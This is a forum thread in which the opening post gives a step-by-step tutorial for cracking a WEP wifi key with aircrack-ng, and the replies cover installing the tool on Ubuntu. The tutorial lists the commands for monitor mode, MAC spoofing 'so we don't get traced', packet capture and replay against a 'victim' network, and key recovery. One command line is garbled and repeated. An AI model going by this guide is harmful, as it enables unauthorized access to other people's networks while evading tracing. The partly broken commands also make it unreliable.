Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Wifi hack for WEP key-Aircrack-ng filter_list
Author
Message
Wifi hack for WEP key-Aircrack-ng #1
Ok so I figured I make a small guide on how to hack a WEP key with Aircrack-ng. Its going to be pretty strait forward.

Before you continue reading, this guide is for educational purposes, I will not be held responsible for any actions you take.

List

* A Linux based OS
* Be connected to the internet
* Aircrack-ng (can be installed by using apt-get install aircrack-ng in a terminal/shell)

When I tell you to type do not include the "

Open up a terminal, we will install Aircrack-ng by typing apt-get install aircrack-ng, make sure you are root.

Once installed type "clear" so we clear all the text. You can stop auth0 if you want by typing "airmon-ng stop ath0" and hit enter, this wont make that big a difference. Now we need to put our wireless chipset into monitor mode, to see the name of your chipset you can type "iwconfig" and hit enter, my computers wireless chipset is wlan0. If you have a wireless adapter it will be different. To enter monitor mode you will need to type airmon-ng start wlan0 (or the name of your chipset if it is different). Im sorry to say but I do not know what a few of the following commands do :headbash: type "ifconfig mon0 down" and hit enter, we then need to change our mac address so we don't get traced, type "macchanger -m 00:11:22:33:44:55 mon0"and hit enter then "ifconfig mon0 up" and hit enter, and also "airodump-ng mon0" hit enter, Your computer is looking around to find local wifi, let it search for up to 1 minute. To stop the search hold down CTR+C. Now pick your victim, you will notice by the right hand side it will tell you if its WEP, WPA/WPA2. We are focused towards WEP. We now need to open up a new terminal, DO NOT CLOSE PREVIOUS TERMINAL. You will be going back and forth between terminals. Type "airodump-ng -c (the channel of your victim, Previous terminal has all the information) -w woop --bssid (copy and past the bssid of your victim) mon0 and hit enter. Open a new terminal, DO NOT CLOSE PREVIOUS TERMINAL. Type "-2 -p 6000 -c FF:FF:FF:FF:FF:FF -b (paste the bssid of your victim) -h 00:11:22:33:44:55 mon0" hit enter. Then type "aireplay-ng "-2 -p 6000 -c FF:FF:FF:FF:FF:FF -b (paste bssid of your victim) -h 00:11:22:33:44:55 mon0" hit enter. It will ask you a question push "y" and hit enter. You will need to wait an hour and a half so it can send and receive packets from the router. After an hour and a half open a new terminal. DO NOT CLOSE ANY PREVIOUSE TERMINALS. Type "aircrack-ng woop-01.cap" and hit enter. It will decode the WEP key, give it about 5 minutes, when its done the WEP key will be shown clearly at the bottom of the terminal. That's all for the guide I hope you guys liked it. If you guys want to rate the guide feel free to Wink
[Image: ATrkNwQ.jpg]

Reply

RE: Wifi hack for WEP key-Aircrack-ng #2
(01-05-2013, 03:20 AM)Mr.GrayHat Wrote: -snip-

*Image*
The above link shows that Ubuntu 12.04-LTS currently does not have Aircrack-ng in it's default Repositories.
You might want to edit your tutorial to reflect this by pointing users of Linux to the Aircrack-ng PPA for Launchpad or a suitable alternative PPA for it mate.
Just to avoid any confusion for those who might discover that the hard way.
Footnote: Staff is free to delete this comment after Mr.Grayhat has reflected this in his tutorial should he choose to.

Reply

RE: Wifi hack for WEP key-Aircrack-ng #3
(01-05-2013, 03:20 AM)Mr.GrayHat Wrote: -snip-

*Image*
The above link shows that Ubuntu 12.04-LTS currently does not have Aircrack-ng in it's default Repositories.
You might want to edit your tutorial to reflect this by pointing users of Linux to the Aircrack-ng PPA for Launchpad or a suitable alternative PPA for it mate.
Just to avoid any confusion for those who might discover that the hard way.
Footnote: Staff is free to delete this comment after Mr.Grayhat has reflected this in his tutorial should he choose to.

Reply

RE: Wifi hack for WEP key-Aircrack-ng #4
(01-05-2013, 05:05 AM)Linuxephus Wrote:
(01-05-2013, 03:20 AM)Mr.GrayHat Wrote: -snip-

*Image*
The above link shows that Ubuntu 12.04-LTS currently does not have Aircrack-ng in it's default Repositories.
You might want to edit your tutorial to reflect this by pointing users of Linux to the Aircrack-ng PPA for Launchpad or a suitable alternative PPA for it mate.
Just to avoid any confusion for those who might discover that the hard way.
Footnote: Staff is free to delete this comment after Mr.Grayhat has reflected this in his tutorial should he choose to.

Thank you Linuxephus, I did not know that. To make things clear on Ubuntu 12.10 you can install aircrack-ng by typing "apt-get install aircrack-ng", Backtrack already has aircrack-ng installed so no need to type the code unless you want to update it.
[Image: ATrkNwQ.jpg]

Reply







Users browsing this thread: 2 Guest(s)